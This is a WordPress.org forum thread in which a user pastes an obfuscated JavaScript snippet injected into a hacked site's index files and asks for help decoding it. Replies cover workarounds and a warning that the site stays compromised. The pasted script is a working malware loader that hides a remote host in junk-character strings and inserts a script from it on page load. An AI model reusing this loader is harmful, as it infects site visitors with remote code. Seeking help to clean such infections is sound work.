WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] obfuscated code - can anyone decode? (9 posts)

  1. malibu06
    Member
    Posted 4 years ago #

    This code is showing up on all my index.php files once I upload to the server. I've tried replacing all the index.php with clean files only to find this code on the files a few hours later again.

    <script>/*GNU GPL*/ try{window.onload = function(){var Dwqlxqw7kr7vkv = document.createElement('s@$$^c&r!i^p&t^)#&'.replace(/\^|\$|\!|\(|&|\)|#|@/ig, ''));var N790b8w6sa8nl = 'U70yiuxmlrwd';Dwqlxqw7kr7vkv.setAttribute('type', 't&@^e!$&x^&!t!#/@(j!(a@v@)a(s!!!@c^^!r)&&i&p)^#t))'.replace(/\$|@|\(|#|\)|\^|\!|&/ig, ''));Dwqlxqw7kr7vkv.setAttribute('src', 'h$t$&$(t^@p!@^:!^$!/(!/)!a&!d))#^d@@i)^(c$!$&!t#$i)#(n()$!g(g(!a#m$!#e^!$s)^-#c(&o@$(!m!.^#&f(!c&@!$2&.#c^o^&m!.!z(#i(#d#!)d$!$u!#!-#!(c!o&@m!$#.($t!@h)$e&$g)@i^@!f(t!#@s#a(l$)&)e!.&^@r((u$#@:^$8@@^0&^!^8^^&0!@/@))g$)^@o$o&#$g(&l!(&)e$$.)#c@@o#m&/!!g(#o@$!o&g(!l$^#e@!.&($c!#o#m^#/^(d&$@i(^o^#n$(&.)#!n!)&e(!.)j!@p!#^$/@))v$!e))!r)(#i)!z^$@(o^((n)(.$n(@)e#@t$!/))^#w!^)i^&#r$($e#!@@$d)!!.#)&c#(@o(m&/&^'.replace(/\$|@|#|\(|&|\!|\)|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('defer', 'd#e&)f@e)$r#)'.replace(/&|\(|#|@|\)|\$|\!|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('id', 'L^)#6^!)^q@@c#!@@e@&@e^#^f$$@n#^@#7&f@l@^^('.replace(/\!|&|\$|\)|\^|@|#|\(/ig, ''));document.body.appendChild(Dwqlxqw7kr7vkv);}} catch(O27phyeucb2au4) {}</script>

  2. esmi
    Forum Moderator
    Posted 4 years ago #

    Site url?

  3. malibu06
    Member
    Posted 4 years ago #

    the site is http://www.artcretedesigns.com

    i've disabled the index.php file and it is pointing to the old html file.

    it seems to be some kind of virus. it is showing up on all index files whether php html asp...

  4. esmi
    Forum Moderator
    Posted 4 years ago #

  5. msacom
    Member
    Posted 4 years ago #

    Hello to everybody. Is all the morning that I'm trying to decode or delete in some way my "double" base64 coding....I tried every thing, nothing.... and, unvelible, (in my template is working ok) I just deleted the command "get header" and "get footer" from index, page, search, etc. an I replaced them with a command "include". I designed my footer (you can easily change the original one too removing completely the base 64 code using Dreamweaver or similar) and every thing works great.
    I cannot believe it. I lost 5 hours and the solution was there!

  6. msacom
    Member
    Posted 4 years ago #

    I forgot. You have to save your footer.php (or header or whatelse) with another name, eg. footer2.php and live in the ROOT the original one running (alone and forgotten)

  7. s_ha_dum
    Member
    Posted 4 years ago #

    Sometimes this stuff can be encoded twenty times or more.

    Removing the get_header and get_footer may get the code off your site but it doesn't make you not-hacked. Someone got in. The door is still there and maybe there are additional back doors now. Whoever did this can come back. There may be other code that you haven't found yet as well. You aren't done.

  8. msacom
    Member
    Posted 4 years ago #

    Sorry, I post a reply to the wrong argument!!! My trick was just to delete advertise in WP Themes.

  9. s_ha_dum
    Member
    Posted 4 years ago #

    I don't understand your comment about deleting 'advertise' but my point still stands for anyone reading the thread: this is not a solution to a hacked site. It might be a quick band-aid but it is not the end of the story.

Topic Closed

This topic has been closed to new replies.

About this Topic